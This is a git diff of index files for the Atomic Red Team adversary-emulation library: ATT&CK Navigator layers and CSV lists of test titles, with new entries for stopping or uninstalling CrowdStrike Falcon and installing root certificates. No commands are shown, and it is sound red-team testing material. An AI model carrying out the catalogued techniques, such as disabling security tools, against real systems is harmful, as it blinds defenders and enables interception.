diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json index 1e10b0c6..bd3c9b9c 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json @@ -1 +1 @@ -{"version":"2.2","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1002","score":100,"enabled":true},{"techniqueID":"T1005","score":100,"enabled":true},{"techniqueID":"T1009","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1022","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1045","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1063","score":100,"enabled":true},{"techniqueID":"T1064","score":100,"enabled":true},{"techniqueID":"T1065","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1081","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1089","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1099","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1107","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1139","score":100,"enabled":true},{"techniqueID":"T1141","score":100,"enabled":true},{"techniqueID":"T1142","score":100,"enabled":true},{"techniqueID":"T1144","score":100,"enabled":true},{"techniqueID":"T1145","score":100,"enabled":true},{"techniqueID":"T1146","score":100,"enabled":true},{"techniqueID":"T1147","score":100,"enabled":true},{"techniqueID":"T1148","score":100,"enabled":true},{"techniqueID":"T1150","score":100,"enabled":true},{"techniqueID":"T1151","score":100,"enabled":true},{"techniqueID":"T1152","score":100,"enabled":true},{"techniqueID":"T1153","score":100,"enabled":true},{"techniqueID":"T1154","score":100,"enabled":true},{"techniqueID":"T1155","score":100,"enabled":true},{"techniqueID":"T1156","score":100,"enabled":true},{"techniqueID":"T1158","score":100,"enabled":true},{"techniqueID":"T1159","score":100,"enabled":true},{"techniqueID":"T1160","score":100,"enabled":true},{"techniqueID":"T1163","score":100,"enabled":true},{"techniqueID":"T1164","score":100,"enabled":true},{"techniqueID":"T1165","score":100,"enabled":true},{"techniqueID":"T1166","score":100,"enabled":true},{"techniqueID":"T1168","score":100,"enabled":true},{"techniqueID":"T1169","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1206","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1519","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true}]} \ No newline at end of file +{"version":"2.2","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1002","score":100,"enabled":true},{"techniqueID":"T1005","score":100,"enabled":true},{"techniqueID":"T1009","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1022","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1045","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1063","score":100,"enabled":true},{"techniqueID":"T1064","score":100,"enabled":true},{"techniqueID":"T1065","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1081","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1089","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1099","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1107","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1130","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1139","score":100,"enabled":true},{"techniqueID":"T1141","score":100,"enabled":true},{"techniqueID":"T1142","score":100,"enabled":true},{"techniqueID":"T1144","score":100,"enabled":true},{"techniqueID":"T1145","score":100,"enabled":true},{"techniqueID":"T1146","score":100,"enabled":true},{"techniqueID":"T1147","score":100,"enabled":true},{"techniqueID":"T1148","score":100,"enabled":true},{"techniqueID":"T1150","score":100,"enabled":true},{"techniqueID":"T1151","score":100,"enabled":true},{"techniqueID":"T1152","score":100,"enabled":true},{"techniqueID":"T1153","score":100,"enabled":true},{"techniqueID":"T1154","score":100,"enabled":true},{"techniqueID":"T1155","score":100,"enabled":true},{"techniqueID":"T1156","score":100,"enabled":true},{"techniqueID":"T1158","score":100,"enabled":true},{"techniqueID":"T1159","score":100,"enabled":true},{"techniqueID":"T1160","score":100,"enabled":true},{"techniqueID":"T1163","score":100,"enabled":true},{"techniqueID":"T1164","score":100,"enabled":true},{"techniqueID":"T1165","score":100,"enabled":true},{"techniqueID":"T1166","score":100,"enabled":true},{"techniqueID":"T1168","score":100,"enabled":true},{"techniqueID":"T1169","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1206","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1519","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json index ff6e79b1..ed78347a 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-windows.json @@ -1 +1 @@ -{"version":"2.2","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1002","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1004","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1015","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1022","score":100,"enabled":true},{"techniqueID":"T1023","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1028","score":100,"enabled":true},{"techniqueID":"T1031","score":100,"enabled":true},{"techniqueID":"T1032","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1035","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1038","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1042","score":100,"enabled":true},{"techniqueID":"T1044","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1050","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1058","score":100,"enabled":true},{"techniqueID":"T1060","score":100,"enabled":true},{"techniqueID":"T1062","score":100,"enabled":true},{"techniqueID":"T1063","score":100,"enabled":true},{"techniqueID":"T1064","score":100,"enabled":true},{"techniqueID":"T1065","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1073","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1075","score":100,"enabled":true},{"techniqueID":"T1076","score":100,"enabled":true},{"techniqueID":"T1077","score":100,"enabled":true},{"techniqueID":"T1081","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1084","score":100,"enabled":true},{"techniqueID":"T1085","score":100,"enabled":true},{"techniqueID":"T1086","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1088","score":100,"enabled":true},{"techniqueID":"T1089","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1093","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1096","score":100,"enabled":true},{"techniqueID":"T1097","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1099","score":100,"enabled":true},{"techniqueID":"T1100","score":100,"enabled":true},{"techniqueID":"T1101","score":100,"enabled":true},{"techniqueID":"T1102","score":100,"enabled":true},{"techniqueID":"T1103","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1107","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1117","score":100,"enabled":true},{"techniqueID":"T1118","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1121","score":100,"enabled":true},{"techniqueID":"T1122","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1126","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1128","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1138","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1141","score":100,"enabled":true},{"techniqueID":"T1143","score":100,"enabled":true},{"techniqueID":"T1145","score":100,"enabled":true},{"techniqueID":"T1158","score":100,"enabled":true},{"techniqueID":"T1170","score":100,"enabled":true},{"techniqueID":"T1173","score":100,"enabled":true},{"techniqueID":"T1174","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1179","score":100,"enabled":true},{"techniqueID":"T1180","score":100,"enabled":true},{"techniqueID":"T1183","score":100,"enabled":true},{"techniqueID":"T1191","score":100,"enabled":true},{"techniqueID":"T1193","score":100,"enabled":true},{"techniqueID":"T1196","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1208","score":100,"enabled":true},{"techniqueID":"T1214","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1223","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1500","score":100,"enabled":true},{"techniqueID":"T1502","score":100,"enabled":true},{"techniqueID":"T1504","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true}]} \ No newline at end of file +{"version":"2.2","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1002","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1004","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1015","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1022","score":100,"enabled":true},{"techniqueID":"T1023","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1028","score":100,"enabled":true},{"techniqueID":"T1031","score":100,"enabled":true},{"techniqueID":"T1032","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1035","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1038","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1042","score":100,"enabled":true},{"techniqueID":"T1044","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1050","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1058","score":100,"enabled":true},{"techniqueID":"T1060","score":100,"enabled":true},{"techniqueID":"T1062","score":100,"enabled":true},{"techniqueID":"T1063","score":100,"enabled":true},{"techniqueID":"T1064","score":100,"enabled":true},{"techniqueID":"T1065","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1073","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1075","score":100,"enabled":true},{"techniqueID":"T1076","score":100,"enabled":true},{"techniqueID":"T1077","score":100,"enabled":true},{"techniqueID":"T1081","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1084","score":100,"enabled":true},{"techniqueID":"T1085","score":100,"enabled":true},{"techniqueID":"T1086","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1088","score":100,"enabled":true},{"techniqueID":"T1089","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1093","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1096","score":100,"enabled":true},{"techniqueID":"T1097","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1099","score":100,"enabled":true},{"techniqueID":"T1100","score":100,"enabled":true},{"techniqueID":"T1101","score":100,"enabled":true},{"techniqueID":"T1102","score":100,"enabled":true},{"techniqueID":"T1103","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1107","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1117","score":100,"enabled":true},{"techniqueID":"T1118","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1121","score":100,"enabled":true},{"techniqueID":"T1122","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1126","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1128","score":100,"enabled":true},{"techniqueID":"T1130","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1138","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1141","score":100,"enabled":true},{"techniqueID":"T1143","score":100,"enabled":true},{"techniqueID":"T1145","score":100,"enabled":true},{"techniqueID":"T1158","score":100,"enabled":true},{"techniqueID":"T1170","score":100,"enabled":true},{"techniqueID":"T1173","score":100,"enabled":true},{"techniqueID":"T1174","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1179","score":100,"enabled":true},{"techniqueID":"T1180","score":100,"enabled":true},{"techniqueID":"T1183","score":100,"enabled":true},{"techniqueID":"T1191","score":100,"enabled":true},{"techniqueID":"T1193","score":100,"enabled":true},{"techniqueID":"T1196","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1208","score":100,"enabled":true},{"techniqueID":"T1214","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1223","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1500","score":100,"enabled":true},{"techniqueID":"T1502","score":100,"enabled":true},{"techniqueID":"T1504","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 799e6747..15aa8804 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -121,21 +121,24 @@ defense-evasion,T1089,Disabling Security Tools,1,Disable iptables firewall defense-evasion,T1089,Disabling Security Tools,2,Disable syslog defense-evasion,T1089,Disabling Security Tools,3,Disable Cb Response defense-evasion,T1089,Disabling Security Tools,4,Disable SELinux -defense-evasion,T1089,Disabling Security Tools,5,Disable Carbon Black Response -defense-evasion,T1089,Disabling Security Tools,6,Disable LittleSnitch -defense-evasion,T1089,Disabling Security Tools,7,Disable OpenDNS Umbrella -defense-evasion,T1089,Disabling Security Tools,8,Unload Sysmon Filter Driver -defense-evasion,T1089,Disabling Security Tools,9,Disable Windows IIS HTTP Logging -defense-evasion,T1089,Disabling Security Tools,10,Uninstall Sysmon -defense-evasion,T1089,Disabling Security Tools,11,AMSI Bypass - AMSI InitFailed -defense-evasion,T1089,Disabling Security Tools,12,AMSI Bypass - Remove AMSI Provider Reg Key -defense-evasion,T1089,Disabling Security Tools,13,Disable Arbitrary Security Windows Service -defense-evasion,T1089,Disabling Security Tools,14,Tamper with Windows Defender ATP PowerShell -defense-evasion,T1089,Disabling Security Tools,15,Tamper with Windows Defender Command Prompt -defense-evasion,T1089,Disabling Security Tools,16,Tamper with Windows Defender Registry -defense-evasion,T1089,Disabling Security Tools,17,Disable Microft Office Security Features -defense-evasion,T1089,Disabling Security Tools,18,Remove Windows Defender Definition Files -defense-evasion,T1089,Disabling Security Tools,19,Stop and Remove Arbitrary Security Windows Service +defense-evasion,T1089,Disabling Security Tools,5,Stop Crowdstrike Falcon on Linux +defense-evasion,T1089,Disabling Security Tools,6,Disable Carbon Black Response +defense-evasion,T1089,Disabling Security Tools,7,Disable LittleSnitch +defense-evasion,T1089,Disabling Security Tools,8,Disable OpenDNS Umbrella +defense-evasion,T1089,Disabling Security Tools,9,Stop and unload Crowdstrike Falcon on macOS +defense-evasion,T1089,Disabling Security Tools,10,Unload Sysmon Filter Driver +defense-evasion,T1089,Disabling Security Tools,11,Disable Windows IIS HTTP Logging +defense-evasion,T1089,Disabling Security Tools,12,Uninstall Sysmon +defense-evasion,T1089,Disabling Security Tools,13,AMSI Bypass - AMSI InitFailed +defense-evasion,T1089,Disabling Security Tools,14,AMSI Bypass - Remove AMSI Provider Reg Key +defense-evasion,T1089,Disabling Security Tools,15,Disable Arbitrary Security Windows Service +defense-evasion,T1089,Disabling Security Tools,16,Tamper with Windows Defender ATP PowerShell +defense-evasion,T1089,Disabling Security Tools,17,Tamper with Windows Defender Command Prompt +defense-evasion,T1089,Disabling Security Tools,18,Tamper with Windows Defender Registry +defense-evasion,T1089,Disabling Security Tools,19,Disable Microft Office Security Features +defense-evasion,T1089,Disabling Security Tools,20,Remove Windows Defender Definition Files +defense-evasion,T1089,Disabling Security Tools,21,Stop and Remove Arbitrary Security Windows Service +defense-evasion,T1089,Disabling Security Tools,22,Uninstall Crowdstrike Falcon on Windows defense-evasion,T1107,File Deletion,1,Delete a single file - Linux/macOS defense-evasion,T1107,File Deletion,2,Delete an entire folder - Linux/macOS defense-evasion,T1107,File Deletion,3,Overwrite and delete a file with shred @@ -184,6 +187,9 @@ defense-evasion,T1070,Indicator Removal on Host,7,Delete System Logs Using Clear defense-evasion,T1202,Indirect Command Execution,1,Indirect Command Execution - pcalua.exe defense-evasion,T1202,Indirect Command Execution,2,Indirect Command Execution - forfiles.exe defense-evasion,T1130,Install Root Certificate,1,Install root CA on CentOS/RHEL +defense-evasion,T1130,Install Root Certificate,2,Install root CA on Debian/Ubuntu +defense-evasion,T1130,Install Root Certificate,3,Install root CA on macOS +defense-evasion,T1130,Install Root Certificate,4,Install root CA on Windows defense-evasion,T1118,InstallUtil,1,CheckIfInstallable method call defense-evasion,T1118,InstallUtil,2,InstallHelper method call defense-evasion,T1118,InstallUtil,3,InstallUtil class constructor method call @@ -407,7 +413,7 @@ discovery,T1082,System Information Discovery,5,Linux VM Check via Kernel Modules discovery,T1082,System Information Discovery,6,Hostname Discovery (Windows) discovery,T1082,System Information Discovery,7,Hostname Discovery discovery,T1082,System Information Discovery,8,Windows MachineGUID Discovery -discovery,T1016,System Network Configuration Discovery,1,System Network Configuration Discovery +discovery,T1016,System Network Configuration Discovery,1,System Network Configuration Discovery on Windows discovery,T1016,System Network Configuration Discovery,2,List Windows Firewall Rules discovery,T1016,System Network Configuration Discovery,3,System Network Configuration Discovery discovery,T1016,System Network Configuration Discovery,4,System Network Configuration Discovery (TrickBot Style) diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv index dc5b1e69..0169eb23 100644 --- a/atomics/Indexes/Indexes-CSV/linux-index.csv +++ b/atomics/Indexes/Indexes-CSV/linux-index.csv @@ -46,7 +46,6 @@ discovery,T1069,Permission Groups Discovery,1,Permission Groups Discovery discovery,T1057,Process Discovery,1,Process Discovery - ps discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep -discovery,T1082,System Information Discovery,2,System Information Discovery discovery,T1082,System Information Discovery,3,List OS Information discovery,T1082,System Information Discovery,4,Linux VM Check via Hardware discovery,T1082,System Information Discovery,5,Linux VM Check via Kernel Modules @@ -72,6 +71,7 @@ defense-evasion,T1089,Disabling Security Tools,1,Disable iptables firewall defense-evasion,T1089,Disabling Security Tools,2,Disable syslog defense-evasion,T1089,Disabling Security Tools,3,Disable Cb Response defense-evasion,T1089,Disabling Security Tools,4,Disable SELinux +defense-evasion,T1089,Disabling Security Tools,5,Stop Crowdstrike Falcon on Linux defense-evasion,T1107,File Deletion,1,Delete a single file - Linux/macOS defense-evasion,T1107,File Deletion,2,Delete an entire folder - Linux/macOS defense-evasion,T1107,File Deletion,3,Overwrite and delete a file with shred @@ -92,6 +92,7 @@ defense-evasion,T1070,Indicator Removal on Host,3,rm -rf defense-evasion,T1070,Indicator Removal on Host,4,Overwrite Linux Mail Spool defense-evasion,T1070,Indicator Removal on Host,5,Overwrite Linux Log defense-evasion,T1130,Install Root Certificate,1,Install root CA on CentOS/RHEL +defense-evasion,T1130,Install Root Certificate,2,Install root CA on Debian/Ubuntu defense-evasion,T1036,Masquerading,2,Masquerading as Linux crond process. defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script defense-evasion,T1055,Process Injection,2,Shared Library Injection via /etc/ld.so.preload diff --git a/atomics/Indexes/Indexes-CSV/macos-index.csv b/atomics/Indexes/Indexes-CSV/macos-index.csv index bfece318..db698cce 100644 --- a/atomics/Indexes/Indexes-CSV/macos-index.csv +++ b/atomics/Indexes/Indexes-CSV/macos-index.csv @@ -104,9 +104,10 @@ defense-evasion,T1146,Clear Command History,3,Clear Bash history (cat dev/null) defense-evasion,T1146,Clear Command History,4,Clear Bash history (ln dev/null) defense-evasion,T1146,Clear Command History,6,Clear history of a bunch of shells defense-evasion,T1090,Connection Proxy,1,Connection Proxy -defense-evasion,T1089,Disabling Security Tools,5,Disable Carbon Black Response -defense-evasion,T1089,Disabling Security Tools,6,Disable LittleSnitch -defense-evasion,T1089,Disabling Security Tools,7,Disable OpenDNS Umbrella +defense-evasion,T1089,Disabling Security Tools,6,Disable Carbon Black Response +defense-evasion,T1089,Disabling Security Tools,7,Disable LittleSnitch +defense-evasion,T1089,Disabling Security Tools,8,Disable OpenDNS Umbrella +defense-evasion,T1089,Disabling Security Tools,9,Stop and unload Crowdstrike Falcon on macOS defense-evasion,T1107,File Deletion,1,Delete a single file - Linux/macOS defense-evasion,T1107,File Deletion,2,Delete an entire folder - Linux/macOS defense-evasion,T1222,File and Directory Permissions Modification,4,chmod - Change file or folder mode (numeric mode) @@ -128,6 +129,7 @@ defense-evasion,T1158,Hidden Files and Directories,6,Hide a Directory defense-evasion,T1158,Hidden Files and Directories,7,Show all hidden files defense-evasion,T1147,Hidden Users,1,Hidden Users defense-evasion,T1070,Indicator Removal on Host,3,rm -rf +defense-evasion,T1130,Install Root Certificate,3,Install root CA on macOS defense-evasion,T1152,Launchctl,1,Launchctl defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script defense-evasion,T1150,Plist Modification,1,Plist Modification diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index 03eaa6e8..55498cb1 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -23,18 +23,19 @@ defense-evasion,T1038,DLL Search Order Hijacking,1,DLL Search Order Hijacking - defense-evasion,T1073,DLL Side-Loading,1,DLL Side-Loading using the Notepad++ GUP.exe binary defense-evasion,T1140,Deobfuscate/Decode Files or Information,1,Deobfuscate/Decode Files Or Information defense-evasion,T1140,Deobfuscate/Decode Files or Information,2,Certutil Rename and Decode -defense-evasion,T1089,Disabling Security Tools,8,Unload 